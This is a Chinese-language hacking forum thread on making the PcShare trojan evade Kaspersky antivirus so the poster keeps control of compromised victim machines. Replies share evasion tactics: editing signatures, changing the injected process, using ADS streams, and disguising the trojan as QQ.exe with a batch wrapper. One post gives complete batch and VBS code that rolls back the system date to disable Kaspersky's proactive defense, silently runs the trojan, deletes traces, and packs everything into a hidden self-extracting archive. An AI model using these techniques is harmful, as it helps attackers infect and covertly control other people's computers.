Board logo

标题: [讨论]关于pcshare的卡巴免杀 [打印本页]

作者: valen886    时间: 2008-7-23 08:28     标题: [讨论]关于pcshare的卡巴免杀

[讨论]关于pcshare的卡巴免杀
议题作者:hzzlh
信息来源:邪恶八进制信息安全团队(www.eviloctal.com

我已经把pcshare的pchide.sys;pckey.dll;pcclient.dll;pcinit.exe做了免杀,都可以过卡巴。
但是今天突然发现肉鸡不上线了,我就自己做了测试,发现这几个文件还是免杀的,生成客户端也可以执行上线,但是要是进行控制卡巴就会报,而且即使不执行命令,将机子重启之后,卡巴就会将客户端直接卸掉,求助各位高手,这就是卡巴的行为查杀吗?这种情况该怎么做免杀?
补充:我用onlydebug和masm加载这几个文件,再用卡巴内存查杀,仍然查不到病毒。

我在网上查了很多资料,其中有个动画是关于灰鸽子的卡巴行为免杀的,他是用UE把插入的ie进程给改成了别的进程,我也想尝试这种方法,可是搜不到ie(我也是插入ie进程的)。用ollydebug加载之后,再用卡巴查内存,仍然查不到病毒,找不到特征码就没有办法进行免杀。因为不知道是查杀哪个文件,pchide.sys又不能乱改,最好的办法就是找到特征码改特征码。我尝试了很多办法,才来发帖的。另外我想,现在杀软对木马的查杀越来越厉害了,很想大家来讨论一下木马的免杀技术。
帖子11 精华0 积分38 阅读权限40 性别男 在线时间44 小时 注册时间2007-1-11 最后登录2008-7-7 查看详细资料TOP 爱要怎么说出口


gpd01
晶莹剔透§烈日灼然
作者: 土人    时间: 2008-7-23 08:28

过卡巴 的主动防御比较难,不过也有办法,BTW,这儿好象不能讨论这个
帖子2 精华0 积分9 阅读权限40 在线时间11 小时 注册时间2005-8-4 最后登录2007-2-7 查看详细资料TOP 让女孩一夜变的更有女人味

skyjay
荣誉会员

作者: 彬仔    时间: 2008-7-23 08:28

没用,就算你过了卡巴主动防,但是交互试保护你不能对肉鸡进行任何操作。

还有为什么LZ是新人可以发帖呢?郁闷的娱乐圈,我很纯洁!!!!
帖子80 精华0 积分3137 阅读权限100 性别男 在线时间106 小时 注册时间2006-9-16 最后登录2008-7-14 查看详细资料TOP 您知道您年薪应是多少?

天狐
晶莹剔透§烈日灼然
作者: p-o-t    时间: 2008-7-23 08:28

笨。你也可以的。發到文章提交区。要是符合发帖的要求才发出来

帖子29 精华0 积分92 阅读权限40 在线时间243 小时 注册时间2006-12-14 最后登录2008-6-20 查看详细资料TOP

hzzlh
晶莹剔透§烈日灼然
作者: 洪记    时间: 2008-7-23 08:28

引用:
引用第1楼gpd01于2007-01-24 10:26发表的:
过卡巴 的主动防御比较难,不过也有办法,BTW,这儿好象不能讨论这个
是什么办法呢?
有人说可以尝试安装ssm来监视文件调用及中断
帖子11 精华0 积分38 阅读权限40 性别男 在线时间44 小时 注册时间2007-1-11 最后登录2008-7-7 查看详细资料TOP 软件项目外包

seaven
晶莹剔透§烈日灼然
作者: M煲    时间: 2008-7-23 08:28

引用:
引用第2楼skyjay于2007-01-24 11:51发表的:
没用,就算你过了卡巴主动防,但是交互试保护你不能对肉鸡进行任何操作。

还有为什么LZ是新人可以发帖呢?
发主题贴的到文章提交那里发。http://www.seaven.org http://forum.dswhack.com is your friend

帖子60 精华0 积分215 阅读权限40 性别男 在线时间383 小时 注册时间2006-11-28 最后登录2008-7-11 查看个人网站
查看详细资料TOP 让女孩一夜变的更有女人味

control
晶莹剔透§烈日灼然
作者: 风影    时间: 2008-7-23 08:28

[s:35]  [s:35] 呵呵`
 免杀技术因该是允许讨论的```
 因为现在很多hack软件都被杀软查杀``
  当然hack软件不一定就是干坏事的``
  比如说抓包工具WSockExpert,杀软就会杀,导致我们用起来就极其不方便.
 呵呵```技术的天堂是允许讨论一切的``!`当然别做坏事就好啦``毕竟hack≠creak
   楼主你可以尝试纯汇编免杀哈`````
     [s:39]Blog:Www.DayRoad.cn
帖子22 精华2 积分89 阅读权限40 在线时间106 小时 注册时间2007-1-10 最后登录2008-4-21 查看详细资料TOP 让女孩一夜变的更有女人味

hzzlh
晶莹剔透§烈日灼然
作者: dgweimann    时间: 2008-7-23 08:28

呵呵,有矛才有盾啊 [s:37]  [s:36]

仅限技术讨论。。。

如果特征码找不到怎么汇编免杀呢?因为那些文件都已经是免杀的了啊。。。。 [s:35]  [s:35]
帖子11 精华0 积分38 阅读权限40 性别男 在线时间44 小时 注册时间2007-1-11 最后登录2008-7-7 查看详细资料TOP

recognize
晶莹剔透§烈日灼然
作者: Laken    时间: 2008-7-23 08:28

用汇编免杀可以过的,我的灰鸽子就是用汇编的,现在还是免杀的
帖子1 精华0 积分6 阅读权限40 性别男 在线时间1 小时 注册时间2007-1-20 最后登录2007-2-12 查看详细资料TOP

taiwansee
荣誉会员

作者: 风之子2006    时间: 2008-7-23 08:28

汇编免杀?能过内存查杀吗?
卡巴的主动防御真的很厉害啊,比如远程控制时打开telnet功能,它马上就拦截了,说什么么程序转向之类的一帆风顺并不能磨炼人。
帖子73 精华2 积分3255 阅读权限100 性别男 在线时间48 小时 注册时间2006-2-6 最后登录2008-6-6 查看详细资料TOP

网络幽灵
晶莹剔透§烈日灼然
作者: 小兵张噶    时间: 2008-7-23 08:28

引用:
引用第0楼hzzlh于2007-01-22 17:22发表的:
议题作者:hzzlh
信息来源:邪恶八进制信息安全团队(www.eviloctal.com

我已经把pcshare的pchide.sys;pckey.dll;pcclient.dll;pcinit.exe做了免杀,都可以过卡巴。
但是今天突然发现肉鸡不上线了,我就自己做了测试,发现这几个文件还是免杀的,生成客户端也可以执行上线,但是要是进行控制卡巴就会报,而且即使不执行命令,将机子重启之后,卡巴就会将客户端直接卸掉,求助各位高手,这就是卡巴的行为查杀吗?这种情况该怎么做免杀?
.......
在你控制的时候必然要调用系统的某些函数,这个调用就是一种行为。
咔吧监视到这种被列入危险系列的行为,就进行阻止或询问用户,故
称为行为查杀!!

具体的怎么过,俺也不清楚,^_^,国内有几个分析了一下,我转载他们的文章在
http://forum.eviloctal.com/read-htm-tid-25716-keyword-.html
哈哈,好多我都看不懂!
前些时间vxk写了个工具可以击溃咔吧的行为查杀!重启才生效。
个人感觉改特征码,太麻烦了。下边有个思路。
http://netghost.webj.cn/article.asp?id=10^_^    社会需求将决定你的价值    ^_^

帖子55 精华2 积分231 阅读权限40 性别男 在线时间130 小时 注册时间2005-7-1 最后登录2008-7-10 查看个人网站
查看详细资料TOP

xiaoyu110
晶莹剔透§烈日灼然
作者: 解生    时间: 2008-7-23 08:28

要做卡巴的免杀,是不是必须要改变计算机的本生的时间.......才能过卡巴的主动防御。 [s:41]`╭喜╮ `╭欢╮ ╭鉨╮

帖子3 精华0 积分13 阅读权限40 性别男 来自江苏连云港市墟沟街 在线时间0 小时 注册时间2006-10-7 最后登录2007-8-5 查看详细资料TOP

白白逍遥
晶莹剔透§烈日灼然
作者: 肥宝    时间: 2008-7-23 08:28

你发过来,我帮你免杀卡巴,可以试一试过主动 [s:39]白白逍遥 没有不可能
帖子13 精华0 积分37 阅读权限40 性别男 来自黑客 在线时间0 小时 注册时间2006-3-24 最后登录2008-7-7 查看详细资料TOP

hzzlh
晶莹剔透§烈日灼然
作者: dahuzi3938    时间: 2008-7-23 08:28

现在在测试poison,改了插入的进程后,卡巴确实不会报了,不过在一开始服务端添加自启动的时候卡巴还是会提示操作的。行为查杀。。。。。。。

卡巴主动防御杀手据说可以过卡巴,原理是在木马在运行的时候把卡巴先暂时关闭,之后再开启,但是我没有测试成功,难道是rp问题??。。。。。。

有个想法,干脆弄个自解压,先执行个批处理,批处理就实现把卡巴服务停掉的目的,可是发现net stop根本停不掉卡巴。。。

达人指教。。
帖子11 精华0 积分38 阅读权限40 性别男 在线时间44 小时 注册时间2007-1-11 最后登录2008-7-7 查看详细资料TOP

网络幽灵
晶莹剔透§烈日灼然
作者: lizhen    时间: 2008-7-23 08:28

引用:
引用第12楼白白逍遥于2007-02-02 11:26发表的:
你发过来,我帮你免杀卡巴,可以试一试过主动 [s:39]
啥子方法呀兄弟,测试成功没!!^_^    社会需求将决定你的价值    ^_^

帖子55 精华2 积分231 阅读权限40 性别男 在线时间130 小时 注册时间2005-7-1 最后登录2008-7-10 查看个人网站
查看详细资料TOP

my咖啡
晶莹剔透§烈日灼然
作者: peterqi    时间: 2008-7-23 08:28

卡巴6好象没有类似于启发扫描的模块,对于卡巴的内存杀毒,其实表面过了内存也过了,重点是瑞星的内存杀毒.
要是你以前修改的时候是用填0,那么现在0是没有用的 肉鸡或许不会上线 你在自己电脑上能上线吗?
试试JMP跳区域看看
  还有就是 卡巴好象有辅助特征码查杀.
帖子9 精华0 积分34 阅读权限40 在线时间15 小时 注册时间2007-1-11 最后登录2008-6-17 查看详细资料TOP

icexiaoye
荣誉会员

作者: 6月14日的邂逅    时间: 2008-7-23 08:28

引用:
引用第13楼hzzlh于2007-02-02 17:29发表的:
现在在测试poison,改了插入的进程后,卡巴确实不会报了,不过在一开始服务端添加自启动的时候卡巴还是会提示操作的。行为查杀。。。。。。。

卡巴主动防御杀手据说可以过卡巴,原理是在木马在运行的时候把卡巴先暂时关闭,之后再开启,但是我没有测试成功,难道是rp问题??。。。。。。

有个想法,干脆弄个自解压,先执行个批处理,批处理就实现把卡巴服务停掉的目的,可是发现net stop根本停不掉卡巴。。。
.......
卡巴主动防御杀手

- -!
说穿了
就是把系统时间变下
让卡巴暂时死了
等一切都OK列

在把时间调回正常的玩世不恭彼此 ⌒ ˇ互相鼓励信任 認眞體驗每⒈兲.!﹏演藝⒉.個亾啲莞鎂傳奇( [淇]儭滗.

帖子728 精华4 积分5182 阅读权限100 性别男 在线时间255 小时 注册时间2006-8-7 最后登录2008-7-14 查看个人网站
查看详细资料TOP

大步
晶莹剔透§烈日灼然
作者: F仔    时间: 2008-7-23 08:28

卡巴好象用了行为检测技术^^^
用ADS流44吧

帖子8 精华0 积分30 阅读权限40 在线时间3 小时 注册时间2007-2-15 最后登录2008-6-21 查看个人网站
查看详细资料TOP

felifan
晶莹剔透§烈日灼然
作者: 树仔    时间: 2008-7-23 08:28

[s:75]  [s:75] 无奈的事情 尽量的不要运行到它的监视区域吧  以后靠感染运行 不要启动项什么的好了菜鸟无所谓思想最重要
帖子60 精华0 积分197 阅读权限40 性别男 在线时间49 小时 注册时间2006-5-5 最后登录2008-5-29 查看详细资料TOP

大步
晶莹剔透§烈日灼然
作者: 忘记密码    时间: 2008-7-23 08:28

不用启动项?
这怎么行
这么着
把QQ.EXE改成QQ2.EXE
木马改成QQ1.EXE
做个批处理
内容为  

qq1.exe
qq2.exe

用BAT2EXE把批处理转成EXE程序
改名为QQ.EXE^^^

帖子8 精华0 积分30 阅读权限40 在线时间3 小时 注册时间2007-2-15 最后登录2008-6-21 查看个人网站
查看详细资料TOP

gbbbgbbb
晶莹剔透§烈日灼然
作者: 白峰    时间: 2008-7-23 08:28

主动防御真是让人伤脑筋..............
帖子2 精华0 积分9 阅读权限40 在线时间3 小时 注册时间2006-10-25 最后登录2008-3-21 查看详细资料TOP

hzzlh
晶莹剔透§烈日灼然
作者: 清风共醉    时间: 2008-7-23 08:28

让卡巴主动防御失效的代码:


第一个批量代码
date 1980-01-01

date 1980-01-01

@echo off & setlocal enableextensions
echo WScript.Sleep 1000 > %temp%.\tmp$$$.vbs
set /a i = 10
:Timeout
if %i% == 0 goto Next
setlocal
set /a i = %i% - 1
cscript //nologo %temp%.\tmp$$$.vbs
goto Timeout
goto End

:Next
%systemroot%\temp\你的木马名字.exe
copy %systemroot%\temp\tmp.SCR %systemroot%\system32\
fot %%f in (%temp%.\tmp$$$.vbs*) do del %%f

date 2007-2-17(当地时间)

RD /S /Q %systemroot%\temp\

第2个是vbs代码
DIM objShell
set objShell=wscript.createObject("wscript.shell")
iReturn=objShell.Run("cmd.exe /C %systemroot%\temp\ser.bat(第一批量文件名字)", 0, TRUE)

把马+BAT文件+VBS文件 压缩成自解压文件 压的时候选高级-自解压选项 解压路径为%systemroot%\temp\ 然后下面解压后运行 写VBS脚本文件的名字 然后选择格式 安静模式选全部隐藏 覆盖方式选全部覆盖 之后 压缩 运行压缩好的文件就会发现 卡巴的主动防御 失效了 呵呵~~!
帖子11 精华0 积分38 阅读权限40 性别男 在线时间44 小时 注册时间2007-1-11 最后登录2008-7-7 查看详细资料TOP

hellokiddy
晶莹剔透§烈日灼然
作者: 一切都好说    时间: 2008-7-23 08:28

一个简单的组策略就可以防住所谓的“更改时间让卡巴失效的阴谋”了呵呵 [s:36]
帖子1 精华0 积分6 阅读权限40 在线时间0 小时 注册时间2006-2-17 最后登录2007-3-19 查看详细资料TOP

帅得不敢出门
晶莹剔透§烈日灼然
作者: kklau    时间: 2008-7-23 08:28

我的卡巴经常遇到问题要重启产品  这个不知道是什么问题 要是能利用也是一个方法
帖子11 精华0 积分41 阅读权限40 性别男 在线时间13 小时 注册时间2007-3-4 最后登录2008-3-28 查看详细资料TOP

ws
晶莹剔透§烈日灼然
作者: 冷酷鲨鱼    时间: 2010-4-24 19:57

别人不是白混的。卖钱的太垃圾了谁会要?




欢迎光临 【3.A.S.T】网络安全爱好者 (http://3ast.com./) Powered by Discuz! 7.2